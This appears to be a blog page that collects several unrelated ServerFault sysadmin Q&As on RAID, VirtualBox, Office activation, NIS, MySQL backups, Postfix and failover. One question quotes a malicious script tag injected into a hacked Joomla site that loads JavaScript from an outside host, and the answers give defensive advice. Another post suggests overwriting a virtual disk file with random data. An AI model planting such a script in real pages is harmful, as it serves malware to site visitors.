Tuesday, January 25, 2011

Simulate a hard disk fail on Virtual Box

I'm testing some NAS setups using virtualbox, with several virtual hard drives, and software raid.

I would like to test the behavior under certain fails, and I would like to simulate that one of the hard disks broke and there's need to rebuild the RAID...

Would it be enough to do a

cat /proc/urandom > /virtualdisk

Or as the virtual disks are containers, VBox couldn't use it and would break the VirtualBox machine?

  • I don't know that you can fail a hard drive this way in VBox (or any VM -- They're typically designed to pretend hardware is perfect). You can try it and see but the results could be pretty awful...

    A better strategy might be to shut down the VM & remove the disk, power on & do stuff, then shutdown & re-add the disk. Another option is to use the software RAID administration tools to mark a drive as failed (almost all of them support this AFAIK), scribble on it from within the VM, then re-add it & watch the rebuild.

    All told however the only real test of a drive failure is to put the OS on real hardware and yank out one of the disks -- This is the only way to know for sure how your OS will react on a given piece of hardware with associated controller quirks.

    From voretaq7
  • I'd just open up the host OS, and move one of the virtual disk set files someplace else, and watch what happens. That would emulate one of the member disks suddenly not being available.

    But as said earlier, that shows how the NAS behaves in that virtualized environment. It may or may not give the identical behavior in a physical configuration.

    From syuroff

Can I Configure a Majority and File Share Quorum Where the File Share is Accessed Over the Internet?

I have a 2-site geographically dispersed Cluster setup and have 1 node in each site. Both sites are connected with FC for large volume synchronous data replication and high-bandwidth network availability.

As I understand the best quorum configuration for this setup is Majority and File Share Quorum, and the File Share must reside in a 3rd site. Can file share be on a hosted machine in a remote site with a reliable private connection?

Sharepoint 2010: Can't create a folder in a custom list

Hi,

I'm trying to create folders in a set of custom lists I've created. However, when I try to do this, the New Folder button in the Ribbon is disabled. I read up on the matter; and this lead me to look to enable folder creation in List Settings -> Advance Settings. However, there doesn't seem to be an option to enable folder creation on the page. It shouldn't be a permission related issue; as I created the lists; and I'm also an admin on the farm.

I could use a document library; but we will not be uploading documents to the list; so this is more then I need.

What are my options, or what am I doing wrong?

Thanks, Frank

  • Folders are not supported by custom lists, as custom lists are used more like a database. Instead using grouping to group the list items according to a certain column value, such as Date, Created By, or a custom column.

    From Mike

problem with Remote-desktop

I want to connect to my rdp but when i want to logon in my remote desktop , after puting user and pass i get this error :

the terminal server has exceeded the maximum number of allowed connections

my server : windows 2003 . what am i going to do ? please help me . Thanks in advance

  • I'm guessing you're running in the default mode where it only allows two simultaneous connections. There are already two idle sessions connected, so you probably just need to fire up Terminal Server manager and kill one (or more) of the idle sessions. You'll be able to connect after doing this.

    Eva : how can i kill one of the sessions ? thanks
    ErikA : From the horse's mouth: http://technet.microsoft.com/en-us/library/cc759296(WS.10).aspx
    From ErikA
  • Connect to the server's console via RDP then fire up Terminal Services Manager to kill off one of the two in-use sessions (which are probably idle due to someone forgetting to log off).

    mstsc /admin /v:serverName
    
    Chris_K : yikes. My answer is startling similar to ErikA's. Honest, I was slowly typing while watching a horrible webinar, not plagiarizing!
    Chris S : Happens all the time. Don't worry about it.
    ErikA : No problem at all.
    From Chris_K

Network Share on File Server Cluster being Interrupted.

When I perform heavy disk operations, like deleting 10k files at a time, the network share becomes unresponsive and won't serve out files for a short time.

Here's my configuration. I have a failover file server cluster composed of two Windows 2008 R2 Enterprise servers. Each server is a VM running on top of two independent Dell Poweredge servers running Windows Hyper-V. Both of the Dell servers have dedicated NICs to a Dell MD3000i SAN. Each of the file server VMs route their iSCSI connections through this dedicated NIC for their connection to the volume on the SAN where the files reside.

If I run a batch file that performs 10k deletes from a remote machine that references the file by share name (ie. \\fileserver\sharename\folder\filename.jpg), it may do 1,000 or 8,000 deletes before the share gives out. It's random each time. Ironically, the batch file will continue deleting the files, but other servers accessing files on that same share will get held up. The files I'm deleting would not be accessed by other servers, so locking of those specific files is not an issue.

If I run the same batch file on the master server of the file cluster and reference the files by their local path (ie. x:\folder\filename.jpg), the share cuts out immediately and the other servers sit and wait. Access to that share will resume when I terminate the batch file running.

Anyone have an idea as to the cause of the share cutting out or what I could do to diagnose this issue further? Any suggestions are greatly appreciated.


Updated Note: I've isolated this problem to occurring only within the boundaries of the host box. None of the network traffic involved to replicate this problem with the VMs reaches the physical switch the host box connects to other than the iSCSI connection to the SAN. The iSCSI connection has it's own dedicated switch and private subnet to the SAN outside of standard network traffic.

  • Good lord. Is there anything in the event viewer to indicate the OS is seeing some sort of resource depletion? Can you inspect with perfmon?

    From mfinni
  • This screams resource depletion of some kind. If this were a Linux host I'd be thinking, "this sounds like a boat load of IO-Wait." Check OS level performance monitors like mfinni pointed out. You have two areas that could be bottle-necking, and that's logical/physical disk performance, and network performance on the iSCSI network connection. PerfMon can give you this. I don't know HyperV at all, but if it is anything like VMWare then you have some performance metrics on the Hypervisor side you can look into as well. Do so.

    As a theory, my guess is that the very high level of metadata updates you're doing is causing some inherent latency in your iSCSI stack to magnify. This in turn crowds out other I/O or metadata requests, which results in the symptoms you describe, other processes can get a word in edgewise as the MFT blocks are being hammered by this other process. iSCSI itself can cause this, but the VM layer is probably adding its own internal delays. If this is indeed the problem, you might want to consider presenting the iSCSI LUN to the hypervisor instead and then presenting the resulting disk to the VM; that way you're not relying on a virtualized network adapter for iSCSI, you're relying on a physical one.

    Edit: It seems that you probably have this kind of fault on your hands. The PerfMon counters I'd pay attention to are "Bytes Sent/sec" and "Packets Sent/sec" for the interface running the iSCSI connection. The combination of the two should give you your average packet SIZE. (alternately, if you have the ability, throw a sniffer into the loop and see what the packets look like at the network switch. This is the more reliable method if you can do it) If that packet size is pretty small (say, under 800 bytes) then there is not much you can do about this other than get down to the TCP level and see what kind of optimizations can be made between your cluster nodes and the iSCSI target. Server 2008 is picky with its TCP settings, so there may be gains to be made here.

    Adam Winter : What you're saying makes sense and has credibility. Any suggestions on how I can prove it? What would I monitor in perfmon to validate this theory? I can't move the iSCSI LUNs to the host box because this is a cluster. If the host box goes down, so do the LUNs, so I have to keep them attached to the VM.
    Adam Winter : Large files copies do not suffer the same problem, but doing a ton of small file deletes locally on the master server of the file cluster kills the share to other servers. If the problem were with the iSCSI going through the virtual switches of Hyper-V, why would it not suffer with big data writes as it does with small requests? I agree that some type of requests are queuing up somewhere, and I need a means of finding out.
    sysadmin1138 : If large-file options don't do it but lots of itty bitty files do, then it is almost definitely meta-data related in some way. What's doing it is probably lots of little data operations on the same few blocks of the file-system. This is the kind of thing that write-combining in RAID cards is designed to help with, but in this case you've got a network stack between you and your RAID cache, and this kind of operation is HIGHLY sensitive to network latency.
    tony roth : do you have the nic's set to auto or manual, how about the switch ports? They need to match.
    Adam Winter : Just had another thought. We setup this file server cluster because we wanted to expand our web hosting environment from 1 server to multiple. The volume on the SAN which the file cluster points to used to be connected to a physical machine using iSCSI running Windows Web 2008. At that time, file ops to this volume were super fast. When we expanded, we mounted this volume to the file cluster running as VMs so that the data would be highly available. Could the move to a VM negatively affect the iSCSI connections? That would imply the virtual switch within Hyper-V is the main culprit.
    sysadmin1138 : The virtual switch in Hyper-V is my top suspect right now. The kind of op you're doing will seriously magnify even small slowdowns in there.
    Adam Winter : One more thought on this subject. Before moving this volume from the physical machine as described above, we converted that physical machine to a virtual machine on the same host as the file cluster node. The iSCSI connection on the web server VM still performed great with the batch file. What would have caused performance to drop when moving that volume from the web server VM to the file server VM on the same host, using the same NICs and virtual switch on the host? Something to do with the cluster service?

Which CPU for XEN - LAMP testbed - Budget

Dear serverfault knowledgeables, im in a decision dilemma right now, which I can't resolve due to lack of hands on experience.

I need to build a testbed for basically virtualizing a LAMP application (os'ses not yet decided) including server side calculations. I'll opt for XEN since it seems better supported by cloud hosters at the moment. The hardware is for a proof of concept for a startup doing saas and might be used for closed live alpha/beta later on.

After testing, the testbed might be

a) deployed as a colocated white box server

b) used as workstation

  • Single socket is enough.
  • We want to have ECC memory for reliability, this excludes most of the consumer line at intel.
  • If intel CPU, then threaded cpu (HT) is preferred
  • have at least 16 gig ram
  • If justified by price and reliability is not too bad, a high quality desktop MB instead of a server MB would be worth a try

It came down to the opteron 6128 vs. the xeon 5620 for me after a lot of research, but I don't necessarily have to be right.

Which CPU is preferrable, concerning TCO (MB price, power requirements 24/7...) , Opteron 6128 or Xeon 5620? Which one offers better performance in real world applications? (Do You have any other suggestions I probably overlooked?)

Thank You for Your consideration

  • Some theoretical numbers:

    • Intel E5620: 2.4Ghz with 4 Cores + HT. Turbo-boost can bump that to 2.66Ghz giving approximately 12.5Ghz of aggregate CPU, maybe a bit more if your workload is very HT friendly. Up to 25GByte/sec memory bandwidth provided you populate all three memory channels with 1333Mhz DDR3, or about 6.25Ghz per core \ 3.125GByte/sec per thread.

    • Opteron 6128: 2Ghz with 8 full cores giving 16Ghz of aggregate CPU, approximately 28.8GByte/sec memory bandwidth given that it has four memory channels per socket (2 per die), or about 3.6GByte/sec per core.

    Obviously not all CPU Ghz are equal and real world numbers will be a lot lower but there is a clear difference in approach with Intel currently providing lower [full] core counts that are kept fed with with more main memory bandwidth (in total and per core).

    If absolute CPU grunt is what you are looking for then the Opteron will be better, if memory bandwidth per core is more important then the Xeon will be better, if your needs are somewhere in between then the differences will be less clear cut although I think the AMD edges out the Intel for your type of use cases. Anandtech has a good comparison of the 6 Core Xeon 5670 and the Opteron 6174 that compares the higher end (6 Core Intel vs 12 Core AMD) of these two CPU families but I think their conclusions will apply more or less to the two lower end CPU's you are looking at.

    On the cost front the Intel CPU is more expensive (the street price difference between the two puts the Xeon E5620 about $120 more expensive than the Opteron 6124 at the moment) and it must be configured with memory in sets of 3 DIMMs in order to realise it's maximum memory bandwidth. This means that memory sizes of 6, 12 & 18 etc GByte are what you should be looking at. The AMD, having 2 on die memory controllers, performs best with the more usual 4,8 & 16 etc. If 16GByte is the minimum you require then you should factor in the additional cost of the extra DIMM(s) which will make the Intel option even more expensive.

    One final detail is that the E5620 supports Intel's new hardware AES instructions that might make a significant difference if your use case makes any significant use of crypto functions that will make use of them.

    Chris S : The Opteron has 2 memory channels per die, and 2 dies per package; you're numbers for the Opteron's memory bandwidth should be 28.8 GB/s or 3.6 GB/s/core.
    Helvick : Ah - good point, thanks for catching that - I got myself confused when looking at the specs. I've corrected the content. The key points remain but the bandwidth per core data point is obviously not as significant as I'd made out originally.
    From Helvick
  • "14.4GByte/sec memory bandwidth given that it has two memory channels, or about 1.8GByte/sec per core."..."with Intel currently providing lower [full] core counts that are kept fed with with more main memory bandwidth (in total and per core)."

    Sorry, i don't understand. I researched a few hours now and I might be wrong as I've been out of the processor talk for years now, but serverfault, Anandtech, wikipedia (sorry), even PCPRO and AMD1, AMD2 , AMD3 state that the 6100 series (MC) has 4 memory channels with high memory transfer rates ( Anandtech, Anandtech2).

    Sorry, I had to [remove direct references] obfuscate all hyperlinks because of serverfault's limits on low reputation posts. Just take http://developer.amd.com/documentation/articles/pages/Magny-Cours-Direct-Connect-Architecture-2.0.aspx as main reference.

    So please clarify as my maths seem to work differently, but I might be wrong:

    Opteron 6100 have 2 dies per package (=processor housing) and 1 memory controller per die AMD, being 64 bit wide and running at 1.8 GHz Anandtech, where my maths gives me 64 Bit bus times 1,8 GHz per mem controller (=per die) = 14,4 GB/s per die, not in total, which at 4 cores per die gives 3.6 GB/s per core (if all cores are equally stressed).

    So the Opteron would have more memory bandwidth per core than the Xeon per thread. Also the complete opteron processor would have 28.8 GB/s memory global bandwidth, which is higher than with the Xeon part.

    Thanks for any clarification.

    Chopper3 : Are you looking for absolute power or value here? your question suggests the latter but now you're interested in top end detail - I don't understand.
  • When buying metal to run VMs I usually go with the lowest server class cpu I can find, and I target 2~4 gigabytes of ram per core depending on the hardware and the expected workload.

    • "server class" = Xeon or Opteron
    • "lowest" = less GHz and/or watts

    You'll end up having 4 cores sitting idle most of the time waiting for disk activity, unless you have a really good I/O subsystem (big raid with lots of spindles and/or fast disks and/or SSDs, either directly attached or via SAN).

    From Luke404
  • Which CPU is preferrable, concerning TCO (MB price, power requirements 24/7...) , Opteron 6128 or Xeon 5620? Which one offers better performance in real world applications? (Do You have any other suggestions I probably overlooked?)

    • MB Price: Opteron boards are usually a little cheaper than Xeons. Here are a few to mention:
      1. TYAN S8230GM4NR Dual Socket G34 ($469.99)
      2. ASUS KGPE-D16 Dual Socket G34 ($439.99)
      3. SUPERMICRO MBD-H8SGL-F-O ($264.99)
    • Power requirements hands down goes to Opterons as long as you go for HE or EE versions. AFAIK, Opteron 6100 series only has HE (wikipedia).
    • Better performance in real world applications: This can go either way. Xeons typically do very well with data crunching operations largely in part to a larger L3 cache while Opterons typically don't have as much L3. There are other factors in the Xeons performance, but in your case, I'm not so sure it matters.

    I need to build a testbed for basically virtualizing a LAMP application (os'ses not yet decided) including server side calculations. I'll opt for XEN since it seems better supported by cloud hosters at the moment. The hardware is for a proof of concept for a startup doing saas and might be used for closed live alpha/beta later on.

    Okay, so this project is really a "proof of concept for a startup doing saas"? Spend the least amount of cash as you can with the most room to upgrade should it be necessary. While I admit my AMD fanboy-ish stance, I'd say for your particular situation, I'd focus less on the production/final environment of your product/service and just focus on the test bed aspect.

    Budget is not just a concern, it is the primary concern so just go the cheaper route while meeting your minimum requirements (CPU, 16GB ECC RAM, etc.) which tends to work in favor of AMD as they still use DDR2 for slightly older Opterons (Istanbul, Shanghai, Barcelona). Newer Opterons do use DDR3 which is a little more costly but I'd scale things back as much as you could while having room to grow.

    So for example, maybe get a dual socket board, and high density RAM (4x4GB or 2x8GB DIMMs) so that should you need to expand it's an option. Building servers is largely about budget which translates into whether you have the ability to upgrade. Seeing how this is just a test bed, keep the costs as low as you can.

    Last few notes/suggestions:

    • Keep in mind, technology changes so even with your alpha/beta product in use, maybe at some point in the future you switch to Xeons. That's totally fine. But there's really nothing that you can do now to really forsee the future. Just focus on costs and upgrade path and just run with it. Don't sweat the infinitesimal details now. Startups need a lot of progress fast.

    • Don't forget about a good RAID controller as well! CPU/RAM don't mean much without some good disk I/O!

    From osij2is
  • Whilst I utterly adore Intel's 55/56xx series chips, know them to be incredibly fast and buy them all the time I have the luxury of budget - it seems value is more of a concern for you.

    With that in mind I'd like to suggest a third option - AMD's Athlon II X3 440. It's seriously cheap, only has 3 cores but at 3.0Ghz, supports ECC and 16GB as well as coming in mainstream desktop form. If this is purely a PoC system why not get the cheapest thing that'll do the job?

    The CPUs themselves are like $50 (5620's are >6x that) and I just spotted THIS mobo too. Hope this at least makes you think about the problem a different way.

    From Chopper3
  • Your path of least resistance might be to hop onto ebay and buy a HP XW9400. Secondhand ones ae quite cheap, although you need to make sure you get one with the right CPU. You want Opteron 237x or 2380 CPUs - 2200 series Opterons don't support nested page tables and 234x/235x series (Barcelona) ones have a hardware bug.

    If you don't mind fitting your own CPU, ones with 2200 series opterons can be bought for a few hundred dollars and you can get an Opteron 2376 for about $500 off ebay. You will need to make sure you get a compatible heatsink, but the ones in the machine will probably do fine.

    XW9400s take DDR2 memory, of which there is a significant glut on the market due to overproduction. 8GB DDR2 ECC registered kits compatible with an XW9400 should cost about $250 each off Ebay. If desired, you can expand the machine to two sockets with 4-6 core Opteron chips and 64GB of RAM.

    This gives you a fairly cheap development workstation with hardware VM support and pretty good quality componentry and buckets of headroom. You can put SAS or SATA disks on it, and it has PCIe -x4/x8 slots that will take most RAID controllers, should you feel the need. Note that the motherboard is an OEM version of a Tyan S2915 (IIRC).

Office 2010 silent activation after unattended installation

I've created an unattended install of Office 2010 using the OCT. We are using a MAK rather than KMS (not my decision). Is there a way to activate Office 2010 after the install? Even though the key is set during the install, it does not activate.

I don't want the users to be prompted to activate since this is going to be in a lab environment.

  • In case anyone was wondering - Office installs OSPP.VBS in the office14 directory and can handle office activation, among other things.

    In OCT I set it to run c:\windows\system32\cscript C:\"Program Files (x86)\Microsoft Office\Office14\OSPP.VBS" /act during post-installation.

    All office products are activated after that. I have it silent install Visio, Project and then Office and have Office kick off the activation after and all three products are activated at once.

    From MarkM
  • Hi Mark, My University is working on an Office 2010 rollout as well. I think one of our guys may have figured out how to configure the silent installer but now it doesn't run properly in the login script. We would like to put it in the login script and install for certain users on certain days. Do you have any suggestions?

    MarkM : Hi Jen, you should post this as a new question so that others may find it more easily. What doesn't run right in the login script? Did he make a transforms by running setup.exe /admin?
    Jen : Thanks, Mark. I will ask the System Admin to chime in. I don't know what he did. Thanks!
    From Jen
  • I have been trying unsuccesfully to push out an Office 2010 install via a Netware 6.5 login script (Netware client 4.91SP5). We're using the script to call a batch file on a network share which tests for the workstation's installed O/S version (winxp or win7), then checks for an existing 2010 install, and if not found, runs the Office 2010 setup.exe file.
    The batch file executes as designed, however setup errors out with the Windows message: "Please go to the Control Panel to install and configure system components." This is the same error that gets returned when I try to install Office 2010 with a Novell ZenWorks7 Application Launcher app.
    Any ideas would be appreciated. My workaround is to email users a shortcut they copy to their desktop that points to the install batch file on a network share; this seems to install the product without issues.

    MarkM : Kevin, can you please post this as a new question. This is a Q&A site and not a forum. I can give you a couple tips, but I am unfamiliar with Novell/Windows integration. You will get much better responses from the community if this is a question of its own.
    From Kevin
  • @ Kevin - I've see this before in our my environment. This error usually occurs when in the script you is finding setup.exe in one of your path variables, what you need to do is point to it using a specific path.... eg S:\Office2010\setup.exe or "\servername\foldername\setup.exe

    @MarkM - Exactly what I was looking for, Thanks!

    From Carl
  • Not to muddy the waters on this post but I set this up using this command in OCT:
    [WindowsFolder]\system32\cscript [INSTALLLOCATION]\OSPP.VBS
    With the paramater of /act

    Just in case someone else needs that info. Ross

    From boezo
  • Thanks Carl. Putting the UNC path in the batch file which calls the setup and config file worked for me.

    Cheers

    From Jamie
  • Guys,

    I have tried adding [WindowsFolder]\system32\cscript [INSTALLLOCATION]\OSPP.VBS into OCT however this did not work.

    I create a batch file separately to run c:\windows\system32\cscript C:\"Program Files (x86)\Microsoft Office\Office14\OSPP.VBS" /act however this doesn't work either.

    Users are still getting the activation window on first time run of Office, however if I login as an admin, everything works fine "/

    From Greg

PHP exit status 255: what does it mean?

I recently compiled a php 5.2.9 binary, and I tried to execute some php scripts with it. I can execute some scripts without problems, but one of them halts its execution midway, exiting with no errors or warnings. The returned status code of the process is 255.

I've read in the manual that such status is 'reserved'. The question is: for what?

I believe it's got something to do with missing dependencies in the php executable, but I can't be sure.

Anyone knows what does an exit code of 255 mean?

thanks,

Silvio

P.S. there are no errors in the php scripts, they run ok on other machines.

  • 255 is an error, I could reproduce that same exit code by having a fatal error.

    This means that somehow your error reporting is hidden, there are some possible causes for this:

    • error_reporting is not defined and php reports no error at all
    • STDERR is redirected somewhere else (php -f somefile.php 2>/dev/null, remove the redirection)
    • This could still be an internal error due to missing dependencies and that a fatal error has the same exit code as a program crash.
    From Weboide

Disable nis login for a particular user on a particular machine.

Hi, We have a nis server and a nis client in a domain. As part of the in-charge of a subdomain, I want to enable nis logins for only some users on a particular machine, and want to disable the rest of the users. I DO NOT have administrative access to nis master password file. Can it be done. If so, how?

e.g. machine1, all users enabled for nis login machine2, only xyz, and pqr are allowed to login machine3, abc and def are not allowed, rest all are allowed.

In short, to allow/disallow a subset of users from accessing a particular nis-client, without root/administrative privileges to the nis server.

nsswitch.conf looks like this:

#other entries before this
passwd:     files nis
shadow:     files nis
group:      files nis
#other entries after this. 

Client runs Ubuntu 10.04.(Don't flame me for this please :|) My /etc/passwd does not have a +:::::: entry, but/and all the users from nis can log in.

Thanks.

  • tYes, in many ways:

    1. Have a netgroup created by your NIS administrator and "+" the netgroup in /etc/passwd
    2. Explicitly "+" the users who should be allowed to log in to this host in /etc/passwd
    3. "+" everyone (or a netgroup that is a superset) and explicitly "-" the users who SHOULD NOT be allowed to log in to this host in /etc/passwd

    Number 1 is usually considered "more correct" from an admin standpoint
    Number 2 is convenient if you don't have a lot of users who need to access this host and your admin team is slow creating/updating netgroups.
    Number 3 is best if there are a few users who should be excluded but everyone else (or everyone else in a specific netgroup) should have access - e.g. denying an intern access to the NIS master server :-)

    (If you have had the misfortune to be dropped into a NIS environment and don't have much experience with it I suggest picking up a copy of the O'Reilly "Managing NFS & NIS" Book - http://oreilly.com/catalog/9781565925106 - It's a good bet if you're in a NIS shop someone has a copy laying around :)

    : I'm probably doing something very stupid, but as you said, on the client side /etc/passwd, I added a line +xyz:::::: once, and +xyz once to allow only xyz to login, but others are able to login too. Am I supposed to restart something?. Would you be able to correct me please. Thanks.
    voretaq7 : If you are running `nscd` that needs to be restarted, otherwise double check that you don't have any other `+` lines -- you should only have `+user::::::` entries for the people who should have access. If you have a `+::::::` hanging around it will include everyone you don't explicitly `-` out. You can test using the `id` command (People who aren't +'d in shouldn't exist according to `id`). There's also a very slim possibility that your OS has a terribly broken NIS implementation & doesn't respect `+` and `-` lines, but that's not very likely.
    : I'm not sure you'd be reading this comment so late, but can you please check the edit to my original question. I have added the content of file nsswitch.conf, and mentioned the fact that /etc/passwd doesn't already have a +:::::: entry.
    From voretaq7

mysql incremental backup

Right now i have a cron job that dumps my database twice a day. Right now its fine because my DB is < 100mb. I have limited space on the server (also i'd like to reverse space for other things). How do i make incremental backup with mysql? i would like to do it every 3-4 hours and a full dump on a weekly basis.

How do i do this? Also i hear using a 'binary log' is good but i am unsure how to do that properly.

Many links is welcomed.

  • Mysql.com explains how to make incremental backups: mysql.com backups . It also tells you how to restore those backups mysql.com recovery.

    Have you tried Gzip'ing your dump files? You should be able to reduce your dump file size by 75%. That would save you a lot of space without the extra effort required for incremental backups.

    mysqldump -p$Pass -u$User $DATABASE | gzip --best > $DATABASE.$TIME.gz
    
    From racyclist
  • If you use Innodb storage engine, you have two options. One is commercial Innobackup solution and the other is Xtrabackup by Percona. I use the latter. Not perfect, still a lot of problems, but most of the time it works. BTW, I had better results with 1.0 version than with later releases. Check http://percona.com.

    From minaev

Can I boot from a software RAID5 setup with linux?

I am planning the setup of a new NAS system, deciding if using Openfiler or something similar.

I've been checking some RAID cards, and thinking about hardware failure or substitution, and I have the doubt if I could make a system boot directly from a software RAID5, without having to boot from another volume first.

That would give me the flexibility of substituting my hardware in case of any fail without problems, knowing that the software is handling my RAID and I'm not dependent on any brand or model in particular...

  • Yes, with a slight modification.

    Partition your disks into two Linux Raid partitions - one 128MB partition for /boot and the rest for RAID5.

    Then use software RAID1 to mirror all the small 128MB partitions.

    You'll end up with something like:

    michael@baron:~$ cat /proc/mdstat 
    Personalities : [raid1] [raid10] 
    md0 : active raid1 sda1[0] sdd1[3] sdc1[2] sdb1[1]
          136448 blocks [4/4] [UUUU]
    
    md1 : active raid10 sda2[0] sdd2[3] sdc2[2] sdb2[1]
          143090816 blocks 64K chunks 2 near-copies [4/4] [UUUU]
    
    Andor : Sounds good... I wonder if Openfiler would have direct support of being installed like that...
    Andor : Works fine... I just have to put in under... 'stress' :D
    From MikeyB

Postfix: Problem resolving email addresses when using external DNS

Hi,

I have a server configuration that includes Postfix and it is configured to use an external DNS. The domain names involved are configured on the same server but are not live yet (externally they do resolve to their correct OLD IP). Basically we are going to switch externally hosted websites to our server and update name servers.

Performing a ping of one of the domains in question will reveal the correct old IP. However, when postifix attempts to resolve the domain it sees that we have the domains registered on our server and doesn't bother performing a DNS lookup (if it did it would see that they sites actually exist externally).

Is there anyway to force postfix to ignore the locally-created domain names and always perform a DNS looksup until we are ready to 'turn on' (update nameservers) our newly created domains?

Thanks in advance!

  • Here is the section from main.cf which I believe applies to your situation:

    # In addition to the above, the Postfix SMTP server by default accepts mail
    # that Postfix is final destination for:
    # - destinations that match $inet_interfaces or $proxy_interfaces,
    # - destinations that match $mydestination
    # - destinations that match $virtual_alias_domains,
    # - destinations that match $virtual_mailbox_domains.
    # These destinations do not need to be listed in $relay_domains.
    

    Make sure that your domain is not listed in those locations. Additionally, $myhostname and $mydomain should be free of the domain in question or it will accept mail for that domain. But, you should add it to the $relay_domains so it knows to relay the mail it receives for that domain.

    Edit: Additionally, you may be able to add the mail server hostname to the /etc/hosts file until your nameservers are switched over.

Purpose of JBoss tables

Hi

Can anyone point me in the direction of some documentation (or provide the information here) about the following tables, created by JBoss 5.1.0 when it starts up?

I know what they are for at a high level, and know why they are there, but I could do with some lower-level documentation about each table's purpose.

The tables are:

  • hilosequences
  • timers
  • jbm_counter
  • jbm_dual
  • jbm_id_cache
  • jbm_msg
  • jbm_msg_ref
  • jbm_postoffice
  • jbm_role
  • jbm_tx
  • jbm_user

I know that the first two are associated with uuid-key-generator and the EJB Timer Service respectively, while the rest are associated with JBoss Messaging. What I want to know is something along the lines of "jmg_msg stores each message when it is created...", that kind of thing.

I wasn't sure where to ask this question, ServerFault or StackOverflow, but I decided it wasn't programming related so thought I should put it here - I hope that's ok!

Thanks

Rich

  • Seeing as I had no response here, I've re-asked the question at StackOverflow.com.

    From Rich

Can a VM's virtual disk span over multiple nodes in Ubuntu Enterprise Cloud?

How does storage works with the ubuntu enterprise cloud?

If I have two disks (on separate machines) with free space 10gb and 20gb, can I have a VM running with 30gb of disk space?

  • No you can't. This may be possible with very specific datastore technology but I'm not even sure.

  • I'm not familiar with Ubuntu Cloud, so take this with a huge grain of salt. GlusterFS can be configured to provide the storage like you want. There may be performance implicates for doing this as well.

    If you're trying to use up every last little gigabyte you've got left, it's probably time for a new HD (or three). If you're just looking for a clustered filesystem so VMs can be bounced around to different hosts easily, Gluster is probably what you're looking for.

    From Chris S

kollinsoy.skyefenton.com attack?

Recently My website was attacked by a Malware. it convert my index page into blank. The attack add 2 lines to my index.php :

<script type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Data_Type.js"></script>
<!--6aa6b5f1b4e70b5a72df7793c2b6e64b-->

I'm using joomla 1.5.11 with such considered secure server. How it happens and how to prevent it for the future.

  • 1) latest updates.

    2) run IDS, and keep checksums of files that aren't supposed to be changing.

    3) consider putting in a system for versioning files that aren't supposed to be changing.

    4) don't run software that isn't necessary.

    5) isolate processes and services as much as possible and run with reduced privileges to the lowest level possible.

    6) subscribe to security and user mailing lists for software you use, like Joomla groups and software you're using for your servers.

    7) backup backup backup

    8) format and reinstall your server from known-good source. You don't know how far the compromise goes back or what rootkits or other issues have been introduced.

    9) install monitoring software on systems for your switches, routers, firewall...get to know "normal" traffic patterns from anomalies, then investigate when something starts looking weird.

    10) stay familiar with your business's servers and workflow. Familiar enough that you can just "Feel" when something isn't right with the servers. Investigate. Check logs.

    11) configure remote logging to a secured server. Compromised systems easily cover their tracks when the logs are local.

    12) pick up some books on system security or delegate someone to be in charge of updates, security issues, etc.

    13) isolate Internet-facing systems from your internal development, backup, etc. systems. Backups are no good if your internal systems are monitored by loggers and sniffers.

    14) keep researching server security with books and articles online, since this site cannot possibly cover everything you should know if you want to protect your business (and your customers) on a topic like that.

    Chris S : +1 "7) **backup backup backup"**
    Bart Silverstrim : i should have said that the backup should be more than a basic file backup but rather able to re-install from bare metal, and goes far enough back that you can reinstall pre-compromise.
  • That exploit typically takes place through a leaked ftp username/password

    From karmawhore
  • This is a common attack using stolen FTP credentials. So even if your Joomla install is secure, you need to use good passwords.

    First thing to do now is change your passwords asap.

    Details of this malware:

    http://blog.sucuri.net/2010/06/web-sites-hacked-with-malware-from-iopap-upperdarby26-com.html

    http://sucuri.net/malware/entry/MW:IOPAP:1

    Ivan Slaughter : Thanks sucuri, really helps my site survive.
    From sucuri

How do I remove the ServerSignature added by mod_fcgid?

I'm running Mod_Security and I'm using the SecServerSignature to customize the Server header that Apache returns. This part works fine, however I'm also running mod_fcgid which appends "mod_fcgid/2.3.5" to the header.

Is there any way I can turn this off? Setting ServerSignature off doesn't do anything. I was able to get it to go away by changing the ServerTokens but that removed the customization I had added.

  • ServerTokens is what manipulates the Server response header. (ServerSignature is used for server generated documents.)

    However, if you want to completely control the Server header I would suggest using the Header option:

    Header set Server "Apache/2 my_customizations"
    

    as an example.

    From rjk
  • php.ini:

    expose_php = Off
    
    From karmawhore

Global high availability setup question

I own and operate visualwebsiteoptimizer.com/. The app provides a code snippet which my customers insert in their websites to track certain metrics. Since the code snippet is external JavaScript (at the top of site code), before showing a customer website, a visitor's browser contacts our app server. In case our app server goes down, the browser will keep trying to establish the connection before it times out (typically 60 seconds). As you can imagine, we cannot afford to have our app server down in any scenario because it will negatively affect experience of not just our website visitors but our customers' website visitors too!

We are currently using DNS failover mechanism with one backup server located in a different data center (actually different continent). That is, we monitor our app server from 3 separate locations and as soon as it is detected to be down, we change A record to point to the back up server IP. This works fine for most browsers (as our TTL is 2 minutes) but IE caches the DNS for 30 minutes which might be a deal killer. See this recent post of ours visualwebsiteoptimizer.com/split-testing-blog/maximum-theoretical-downtime-for-a-website-30-minutes/

So, what kind of setup can we use to ensure an almost instant failover in case app data center suffers major outage? I read here www.tenereillo.com/GSLBPageOfShame.htm that having multiple A records is a solution but we can't afford session synchronization (yet). Another strategy that we are exploring is having two A records, one pointing to app server and second to a reverse proxy (located in a different data center) which resolves to main app server if it is up and to backup server if it is up. Do you think this strategy is reasonable?

Just to be sure of our priorities, we can afford to keep our own website or app down but we can't let customers' website slow down because of our downtime. So, in case our app servers are down we don't intend to respond with the default application response. Even a blank response will suffice, we just need that browser completes that HTTP connection (and nothing else).

Reference: I read this thread which was useful serverfault.com/questions/69870/multiple-data-centers-and-http-traffic-dns-round-robin-is-the-only-way-to-assure

  • Your situation is fairly similar to ours. We want split datacentres, and network-layer type failover.

    If you've got the budget to do it, then what you want, is two datacentres, multiple IP transits to each, a pair of edge routers doing BGP sessions to your transit providers, advertising your IP addresses to the global internet.

    This is the only way to do true failover. When the routers notice that the route to your servers is no-longer valid (which you can do in a number of ways), then they stop advertising that route, and traffic goes to the other site.

    The problem is, that for a pair of edge routers, you're looking at a fairly high cost initially to get this set up.
    Then you need to set up the networking behind all this, and you might want to consider some kind of Layer2 connectivity between your sites as a point-to-point link so that you'd have the ability to route traffic incoming to one datacentre, directly to the other in the event of partial failure of your primary site.

    http://serverfault.com/questions/110622/bgp-multihomed-multi-location-best-practice and http://serverfault.com/questions/86736/best-way-to-improve-resilience are questions that I asked about similar issues.

